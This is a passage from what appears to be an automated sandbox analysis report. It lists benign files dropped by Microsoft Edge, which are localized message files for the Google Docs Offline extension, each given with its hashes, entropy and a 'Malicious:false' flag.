                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2766
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                                                              MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                                                              SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                                                              SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                                                              SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):978
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                                                              MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                                                              SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                                                              SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                                                              SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):907
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                                                              MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                                                              SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                                                              SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                                                              SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):914
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                                                              MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                                                              SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                                                              SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                                                              SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):937
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                                                              MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                                                              SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                                                              SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                                                              SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1337
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                                                              MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                                                                                                                              SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                                                                                                                              SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                                                                                                                              SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2846
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.7416822879702547
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                                                                                                                              MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                                                                                                                              SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                                                                                                                              SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                                                                                                                              SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):934
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.882122893545996
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                                                                                                                              MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                                                                                                                              SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                                                                                                                              SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                                                                                                                              SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "VYTVORI. NOV.".. },.. "explanationofflinedisabled": {.. "message": "Ste offline. Ak chcete pou.i. Dokumenty Google bez pripojenia na internet, po najbli..om pripojen. na internet prejdite do nastaven. na domovskej str.nke Dokumentov Google a.zapnite offline synchroniz.ciu.".. },.. "explanationofflineenabled": {.. "message": "Ste offline, no st.le m..ete upravova. dostupn. s.bory a.vytv.ra. nov..".. },.. "extdesc": {.. "message": ".prava, tvorba a.zobrazenie dokumentov, tabuliek a.prezent.ci.. To v.etko bez pr.stupu na internet.".. },.. "extname": {.. "message": "Dokumenty Google v re.ime offline".. },.. "learnmore": {.. "message": ".al.ie inform.cie".. },.. "popuphelptext": {.. "message": "P..te, upravujte a.spolupracuje, kdeko.vek ste, a.to s.pripojen.m na internet aj bez neho.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):963
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.6041913416245
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgfECBxNFCEuKXowwJrpvPwNgEcPJJJEfWOCBxeFCJuGuU4KYXCSUXKDxX4A:1HAXMKYw8VYNLcaeDmKYLdX2zJBG5
                                                                                                                                                                                                                                                                                              MD5:BFAEFEFF32813DF91C56B71B79EC2AF4
                                                                                                                                                                                                                                                                                              SHA1:F8EDA2B632610972B581724D6B2F9782AC37377B
                                                                                                                                                                                                                                                                                              SHA-256:AAB9CF9098294A46DC0F2FA468AFFF7CA7C323A1A0EFA70C9DB1E3A4DA05D1D4
                                                                                                                                                                                                                                                                                              SHA-512:971F2BBF5E9C84DE3D31E5F2A4D1A00D891A2504F8AF6D3F75FC19056BFD059A270C4C9836AF35258ABA586A1888133FB22B484F260C1CBC2D1D17BC3B4451AA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "USTVARI NOVO".. },.. "explanationofflinedisabled": {.. "message": "Nimate vzpostavljene povezave. .e .elite uporabljati Google Dokumente brez internetne povezave, odprite nastavitve na doma.i strani Google Dokumentov in vklopite sinhronizacijo brez povezave, ko naslednji. vzpostavite internetno povezavo.".. },.. "explanationofflineenabled": {.. "message": "Nimate vzpostavljene povezave, vendar lahko .e vedno urejate razpolo.ljive datoteke ali ustvarjate nove.".. },.. "extdesc": {.. "message": "Urejajte, ustvarjajte in si ogledujte dokumente, preglednice in predstavitve . vse to brez internetnega dostopa.".. },.. "extname": {.. "message": "Google Dokumenti brez povezave".. },.. "learnmore": {.. "message": "Ve. o tem".. },.. "popuphelptext": {.. "message": "Pi.ite, urejajte in sodelujte, kjer koli ste, z internetno povezavo ali brez nje.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1320
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.569671329405572
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                              MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                              SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                              SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                              SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):884
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                              MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                              SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                              SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                              SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):980
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                              MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                              SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                              SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                              SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wuser popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1941
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                              MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                              SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                              SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                              SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1969
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                              MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                              SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                              SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                              SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1674
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                              Encrypted:false
